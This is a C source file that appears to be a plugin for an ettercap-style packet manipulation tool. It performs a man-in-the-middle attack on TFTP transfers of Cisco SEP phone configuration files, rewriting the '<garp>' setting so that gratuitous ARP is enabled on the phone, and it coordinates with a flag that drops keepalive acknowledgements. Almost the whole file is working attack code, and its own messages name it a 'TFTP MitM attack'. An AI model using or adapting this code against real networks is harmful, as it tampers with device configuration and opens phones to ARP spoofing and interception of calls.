#include <ec.h>
#include <ec_decode.h>
#include <ec_proto.h>
#include <ec_dissect.h>

extern int begin_tftp_modify_attack;
extern int start_tftp_mod_attack;

unsigned short previousOpcode; /* Stored in network bytes order */
char tempBuffer[8]; /* This buffer holds the <garp>1 string */
int checkTempBuffer;
int garpNotDisabled; /* Garp is not disabled by default in the tftp cfg file */

struct tftpMsg{
	
	unsigned short opcode;
	unsigned short block;
	unsigned char data[513];
};

u_char *findGarpTag(u_char *);
void handleNull(char *);
void parseTFTPBlockOne(struct packet_object *);

FUNC_DECODER(dissector_tftp_modify);

void parseTFTPBlockOne(struct packet_object *packet){

	struct tftpMsg *tftpData ;
	tftpData = (struct tftpMsg *) (packet->DATA.data);
	/* Checks if opcode is a Data packet and the block number is one */
	if((ntohs(tftpData->opcode)) == 03){

		if((ntohs(tftpData->block)) == 01){

			/* Check if the xml version to make sure it is a tftp cnf xml file */

			//if(strstr(tftpData->data,"<?xml version=\"1.0\" encoding=\"UTF-8\"?>") != NULL){

				printf("Receiving SEP CNF XML file via TFTP MitM attack\n");

				/* adding the dissector for this tftp data stream */
					
					dissect_add("tftpmodify", APP_LAYER_UDP, ntohs(packet->L4.src), dissector_tftp_modify);

					/* Initialize the globals */
					memset(tempBuffer, '\0', sizeof(tempBuffer));
					checkTempBuffer = 0;
					garpNotDisabled = 0;
			//}
		}
	}
}

FUNC_DECODER(dissector_tftp_modify){


	DECLARE_DISP_PTR_END(ptr, end);
	struct packet_object *packet = PACKET;
	int lastTftpPacket = 0;

	struct tftpMsg *tftpData;
	tftpData = (struct tftpMsg *) (packet->DATA.data);
	/* Check if it is a Data packet */
	
	if((ntohs(tftpData->opcode)) == 03){

		u_char *garpValuePtr = findGarpTag(tftpData->data);
		
		int tftpDataLength = strlen((char *)tftpData->data);
		if(tftpDataLength != 512){
			lastTftpPacket = 1;
		}
		
		if((garpValuePtr != NULL) || (garpNotDisabled == 1) || (lastTftpPacket == 1)){

			if(garpNotDisabled){
				printf("garp is already enabled on the phone \n");
			}	
		
			/* 0 -> enables garp on the cisco phone configuration */
			if(garpValuePtr != NULL){
				*garpValuePtr = '0';
				printf("Modified the GARP Setting to GARP Enabled \n");
			}
			/* notifies udp that the packet is modified to re-calulate the checksum */
			packet->flags |= PO_MODIFIED;
			/* delete the dissector */
			dissect_del("tftpmodify");
			/* this flag stops dropping keepAliveAckPackets */
			begin_tftp_modify_attack = 0;			
		}

	}
	return NULL;
}

void handleNull(char *msg){

	checkTempBuffer = 1;
	memset(tempBuffer, '\0', sizeof(tempBuffer));
	strcpy(tempBuffer,msg);
}

u_char *findGarpTag(u_char *data){

	int length = strlen(tempBuffer);

	if(checkTempBuffer == 1){

		strncpy(tempBuffer+length, (char *)data, (6-length));  /* 6 == "<garpb>" */ 
		if(!strcmp(tempBuffer,"<garp>")){
			data += (6-length);
			if(*data == '1'){

				return data;
			}
			else{
				garpNotDisabled = 1;
				return NULL;
			}
		}
		checkTempBuffer = 0;
		memset(tempBuffer, '\0', sizeof(tempBuffer));
	}

	
	while(*data != '\0'){

		if(*data == '<'){

			data += 1;
			
			if(*data == '\0'){
		
				handleNull("<");	
				return NULL;
			}
				
			if(*data == 'g'){

				data += 1;

				if(*data == '\0'){

					handleNull("<g");
                                	return NULL;
                        	}

				if(*data == 'a'){

					data += 1;

					if(*data == '\0'){

						handleNull("<ga");
                                		return NULL;
                        		}
				
					if(*data == 'r'){

						data += 1;
						
						if(*data == '\0'){

							handleNull("<gar");
                                			return NULL;
                        			}
						
						if(*data == 'p'){

							data += 1;
							
							if(*data == '\0'){

								handleNull("<garp");
                                				return NULL;
                        				}

							if(*data == '>'){

								data += 1;

								if(*data == '\0'){

									handleNull("<garp>");
                                					return NULL;
                        					}
	
								if(*data == '1'){

									return data;
								}
								else{
									garpNotDisabled = 1;
									return NULL;
								}
							}
						}
					}
				}
			}
		}
		
		data += 1;
	}
	return NULL;
}
					
